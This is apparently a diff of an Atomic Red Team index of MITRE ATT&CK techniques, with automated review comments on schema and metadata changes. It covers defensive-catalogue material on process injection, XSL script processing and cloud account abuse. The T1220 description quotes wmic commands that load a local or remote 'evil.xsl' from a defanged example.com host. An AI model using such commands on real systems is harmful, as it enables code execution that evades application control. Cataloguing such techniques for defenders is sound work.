- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.008:
technique:
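Review bot: `spec_version: '2.1'` is dropped from this object and, as far as the rest of the diff shows, from every other technique object as well. That is a schema change for anything that consumes these index files as STIX-shaped records; confirm no downstream tooling keys on `spec_version` before merging, and mention the removal in the commit message.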
@@ -24393,7 +24682,7 @@ defense-evasion:
description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
Retrieved December 20, 2017.
source_name: Chokepoint preload rootkits
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:26:31.766Z'
name: Ptrace System Calls
description: "Adversaries may inject malicious code into processes via ptrace
(process trace) system calls in order to evade process-based defenses as well
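Review bot: the `modified` timestamp for T1055.008 moves backwards, from `2022-04-25T14:00:00.188Z` to `2021-10-18T12:26:31.766Z`. A regression like this usually means the generator read an older or different STIX bundle for this object; the same backwards move appears for other objects further down (for example T1027.007 and T1564.001), so check the source data rather than treating these as isolated.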
@@ -24438,8 +24727,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1027.007:
technique:
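Review bot: removing `x_mitre_attack_spec_version: 2.1.0` alongside `spec_version` leaves T1055.008 with no attack spec version at all, while neighbouring objects in this same patch keep theirs (T1027.007 retains `x_mitre_attack_spec_version: 2.1.0`, others are bumped to `3.2.0`). If the field is meant to go, it should go everywhere; if not, this hunk should keep it.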
@@ -24484,7 +24771,7 @@ defense-evasion:
To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.
Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-08-23T18:32:46.899Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Obfuscated Files or Information: Dynamic API Resolution'
x_mitre_detection: ''
@@ -24498,7 +24785,6 @@ defense-evasion:
- 'Process: OS API Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1027.007
atomic_tests:
- name: Dynamic API Resolution-Ninja-syscall
@@ -24540,53 +24826,24 @@ defense-evasion:
elevation_required: true
T1055.015:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - ESET
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
- type: attack-pattern
- created: '2021-11-22T15:02:15.190Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1055.015
- url: https://attack.mitre.org/techniques/T1055/015
- - source_name: Microsoft List View Controls
- url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
- description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
- January 4, 2022.
- - source_name: Modexp Windows Process Injection
- url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
- description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
- Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
- Retrieved November 15, 2021.'
- - source_name: ESET InvisiMole June 2020
- url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
- description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
- HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-14T17:34:33.948Z'
name: 'Process Injection: ListPlanting'
description: "Adversaries may abuse list-view controls to inject malicious code
into hijacked processes in order to evade process-based defenses as well as
possibly elevate privileges. ListPlanting is a method of executing arbitrary
- code in the address space of a separate live process. Code executed via ListPlanting
- may also evade detection from security products since the execution is masked
- under a legitimate process.\n\nList-view controls are user interface windows
- used to display collections of items.(Citation: Microsoft List View Controls)
- Information about an application's list-view settings are stored within the
- process' memory in a SysListView32
control.\n\nListPlanting (a
- form of message-passing \"shatter attack\") may be performed by copying code
- into the virtual address space of a process that uses a list-view control
- then using that code as a custom callback for sorting the listed items.(Citation:
- Modexp Windows Process Injection) Adversaries must first copy code into the
- target process’ memory space, which can be performed various ways including
- by directly obtaining a handle to the SysListView32
child of
- the victim process window (via Windows API calls such as FindWindow
+ code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+ Code executed via ListPlanting may also evade detection from security products
+ since the execution is masked under a legitimate process.\n\nList-view controls
+ are user interface windows used to display collections of items.(Citation:
+ Microsoft List View Controls) Information about an application's list-view
+ settings are stored within the process' memory in a SysListView32
+ control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+ be performed by copying code into the virtual address space of a process that
+ uses a list-view control then using that code as a custom callback for sorting
+ the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+ must first copy code into the target process’ memory space, which can be performed
+ various ways including by directly obtaining a handle to the SysListView32
+ child of the victim process window (via Windows API calls such as FindWindow
and/or EnumWindows
) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
methods.\n\nSome variations of ListPlanting may allocate memory in the target
process but then use window messages to copy the payload, to avoid the use
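Review bot: the description now carries `(Citation: Hexacorn Listplanting)`, so the merge depends on the matching `external_references` entry added later in this file; otherwise the citation tag dangles. The rest of the hunk is a key reorder (platforms, domains, contributors and references moved below the description) that produces a large diff for no content change; if the serializer's key order changed, say so in the commit message so reviewers can skip the noise.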
@@ -24603,6 +24860,9 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - ESET
+ x_mitre_deprecated: false
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -24617,16 +24877,47 @@ defense-evasion:
arguments.\n\nAnalyze process behavior to determine if a process is performing
unusual actions, such as opening network connections, reading files, or other
suspicious actions that could relate to post-compromise behavior. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: Process Modification'
- 'Process: OS API Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+ created: '2021-11-22T15:02:15.190Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1055/015
+ external_id: T1055.015
+ - source_name: Hexacorn Listplanting
+ description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+ trick. Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+ - source_name: ESET InvisiMole June 2020
+ description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+ HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+ url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+ - source_name: Microsoft List View Controls
+ description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+ January 4, 2022.
+ url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+ - source_name: Modexp Windows Process Injection
+ description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+ Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+ Retrieved November 15, 2021.'
+ url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1055.015
atomic_tests:
- name: Process injection ListPlanting
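Review bot: the new `Hexacorn Listplanting` reference resolves the citation tag introduced in the description above, and `x_mitre_attack_spec_version` goes from `2.1.0` to `3.2.0` for this object. Note the reference list order changed as well (Hexacorn, ESET, Microsoft, Modexp versus the previous Microsoft, Modexp, ESET); harmless, but it is another sign the generator's ordering is not stable.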
@@ -24666,7 +24957,7 @@ defense-evasion:
elevation_required: true
T1484:
technique:
- modified: '2024-04-19T04:27:31.884Z'
+ modified: '2024-10-15T15:55:32.946Z'
name: Domain or Tenant Policy Modification
description: "Adversaries may modify the configuration settings of a domain
or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -24711,9 +25002,8 @@ defense-evasion:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '3.0'
+ - Identity Provider
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Deletion'
- 'Active Directory: Active Directory Object Creation'
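Review bot: `Azure AD` and `SaaS` are replaced by the single platform `Identity Provider` here, and the same consolidation (plus `Office 365`/`Google Workspace` to `Office Suite`) recurs for T1550.001 and T1078.004 below. Any per-platform index file keyed on the old platform names will silently lose these techniques unless the index generator maps the new names; verify the platform-specific CSV indexes are regenerated from the same data in this change.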
@@ -24770,8 +25060,8 @@ defense-evasion:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Sygnia Golden SAML
description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
Attack. Retrieved January 6, 2021.
@@ -24780,57 +25070,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1220:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Avneet Singh
- - Casey Smith
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
- created: '2018-10-17T00:14:20.652Z'
- x_mitre_version: '1.2'
- external_references:
- - source_name: mitre-attack
- external_id: T1220
- url: https://attack.mitre.org/techniques/T1220
- - source_name: Reaqta MSXSL Spearphishing MAR 2018
- url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
- description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
- MSXSL. Retrieved July 3, 2018.
- - source_name: Twitter SquiblyTwo Detection APR 2018
- url: https://twitter.com/dez_/status/986614411711442944
- description: Desimone, J. (2018, April 18). Status Update. Retrieved July
- 3, 2018.
- - source_name: LOLBAS Wmic
- url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
- description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
- - source_name: Microsoft msxsl.exe
- url: https://www.microsoft.com/download/details.aspx?id=21714
- description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
- Retrieved July 3, 2018.
- - source_name: Penetration Testing Lab MSXSL July 2017
- url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
- description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
- July 3, 2018.
- - source_name: XSL Bypass Mar 2019
- url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
- description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
- Proxy Code Execution. Retrieved August 2, 2019.
- - source_name: Microsoft XSLT Script Mar 2017
- url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
- description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
- Using . Retrieved July 3, 2018.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-09-12T19:40:12.337Z'
+ name: XSL Script Processing
description: |-
Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
@@ -24848,29 +25092,73 @@ defense-evasion:
* Local File: wmic process list /FORMAT:evil[.]xsl
* Remote File: wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: XSL Script Processing
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Avneet Singh
+ - Casey Smith
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.
The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
- kill_chain_phases:
- - phase_name: defense-evasion
- kill_chain_name: mitre-attack
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Process: Process Creation'
- x_mitre_system_requirements:
- - Microsoft Core XML Services (MSXML) or access to wmic.exe
x_mitre_defense_bypassed:
- Anti-virus
- Digital Certificate Validation
- Application Control
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_system_requirements:
+ - Microsoft Core XML Services (MSXML) or access to wmic.exe
+ type: attack-pattern
+ id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
+ created: '2018-10-17T00:14:20.652Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1220
+ external_id: T1220
+ - source_name: Reaqta MSXSL Spearphishing MAR 2018
+ description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
+ MSXSL. Retrieved July 3, 2018.
+ url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
+ - source_name: Twitter SquiblyTwo Detection APR 2018
+ description: Desimone, J. (2018, April 18). Status Update. Retrieved September
+ 12, 2024.
+ url: https://x.com/dez_/status/986614411711442944
+ - source_name: LOLBAS Wmic
+ description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
+ url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
+ - source_name: Microsoft msxsl.exe
+ description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
+ Retrieved July 3, 2018.
+ url: https://www.microsoft.com/download/details.aspx?id=21714
+ - source_name: Penetration Testing Lab MSXSL July 2017
+ description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
+ July 3, 2018.
+ url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
+ - source_name: XSL Bypass Mar 2019
+ description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
+ Proxy Code Execution. Retrieved August 2, 2019.
+ url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
+ - source_name: Microsoft XSLT Script Mar 2017
+ description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
+ Using . Retrieved July 3, 2018.
+ url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1220
atomic_tests:
- name: MSXSL Bypass using local files
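Review bot: the `Microsoft XSLT Script Mar 2017` reference description still reads "XSLT Stylesheet Scripting Using . Retrieved July 3, 2018." with the element name missing after "Using" (present in both the removed and added lines, so it is inherited from upstream where an angle-bracketed name was likely stripped as HTML). Keep it verbatim for fidelity, but it is worth reporting upstream. The Twitter URL moving to `x.com` and the refreshed retrieval date are consistent.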
@@ -25059,7 +25347,7 @@ defense-evasion:
description: 'Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware.
Retrieved July 10, 2017.'
source_name: WireLurker
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-29T22:32:25.985Z'
name: 'Hide Artifacts: Hidden Files and Directories'
description: |-
Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a
for Windows and ls –a
for Linux and macOS).
@@ -25087,8 +25375,6 @@ defense-evasion:
- Host forensic analysis
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1564.001
atomic_tests:
- name: Create Windows System File with Attrib
@@ -25238,42 +25524,7 @@ defense-evasion:
elevation_required: true
T1578.001:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
- type: attack-pattern
- created: '2020-06-09T15:33:13.563Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1578.001
- url: https://attack.mitre.org/techniques/T1578/001
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: AWS Cloud Trail Backup API
- url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
- description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
- Retrieved April 27, 2020.
- - source_name: Azure - Monitor Logs
- url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
- description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
- Retrieved May 1, 2020.
- - source_name: Cloud Audit Logs
- url: https://cloud.google.com/logging/docs/audit#admin-activity
- description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
- - source_name: GCP - Creating and Starting a VM
- url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
- description: Google. (2020, April 23). Creating and Starting a VM instance.
- Retrieved May 1, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:53:44.870Z'
name: Create Snapshot
description: |-
An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.
@@ -25282,6 +25533,9 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.
@@ -25290,20 +25544,51 @@ defense-evasion:
In Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)
Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the gcloud compute instances create
command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the "sourceSnapshot":
parameter pointed to "global/snapshots/[BOOT_SNAPSHOT_NAME]
.(Citation: GCP - Creating and Starting a VM)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Snapshot: Snapshot Creation'
- 'Snapshot: Snapshot Metadata'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
+ created: '2020-06-09T15:33:13.563Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1578/001
+ external_id: T1578.001
+ - source_name: AWS Cloud Trail Backup API
+ description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
+ Retrieved April 27, 2020.
+ url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
+ - source_name: GCP - Creating and Starting a VM
+ description: Google. (2020, April 23). Creating and Starting a VM instance.
+ Retrieved May 1, 2020.
+ url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
+ - source_name: Cloud Audit Logs
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: Azure - Monitor Logs
+ description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
+ Retrieved May 1, 2020.
+ url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1550.001:
technique:
- modified: '2024-04-12T21:18:28.848Z'
+ modified: '2024-10-15T15:38:11.583Z'
name: Application Access Token
description: "Adversaries may use stolen application access tokens to bypass
the typical authentication process and access restricted accounts, information,
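Review bot: `x_mitre_permissions_required: [User]` is dropped for T1578.001 while T1055.015 earlier in this patch keeps the same field; confirm this reflects the upstream object and is not a generator omission. The Mandiant M-Trends URL also changes from `content.fireeye.com` to a `mandiant.com` PDF, which is a content change, not just a reorder, so it deserves a line in the commit message.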
@@ -25360,6 +25645,7 @@ defense-evasion:
- Dylan Silva, AWS Security
- Jack Burns, HubSpot
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -25370,13 +25656,12 @@ defense-evasion:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- Containers
- IaaS
- - Azure AD
- x_mitre_version: '1.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.7'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
x_mitre_defense_bypassed:
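Review bot: `Office 365`, `Google Workspace` and `Azure AD` are removed from T1550.001's platforms in favour of `Office Suite` and `Identity Provider`. Anything that filters this technique into the Google Workspace or Office 365 index files by platform string will now exclude it; check that the platform-specific indexes are rebuilt with a mapping for the new names.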
@@ -25435,11 +25720,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -25479,8 +25763,10 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -25488,13 +25774,13 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -25525,9 +25811,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests: []
T1480.001:
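Review bot: for T1078.004, `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` are moved from the end of the object into the middle (after `phase_name: initial-access` and after `x_mitre_is_subtechnique`), which looks like alphabetical key ordering, while every other object in this patch (T1550.001 just above, T1484, T1220) keeps them at the end. One object serialised differently from its neighbours points at inconsistent generator behaviour; pick one ordering and apply it across the file.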
@@ -25588,7 +25871,7 @@ defense-evasion:
Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.
Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-04T14:52:51.290Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Environmental Keying
x_mitre_detection: Detecting the use of environmental keying may be difficult
@@ -25610,11 +25893,10 @@ defense-evasion:
- Static File Analysis
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564.004:
technique:
- modified: '2024-02-14T21:56:34.831Z'
+ modified: '2024-09-12T15:27:29.615Z'
name: 'Hide Artifacts: NTFS File Attributes'
description: |-
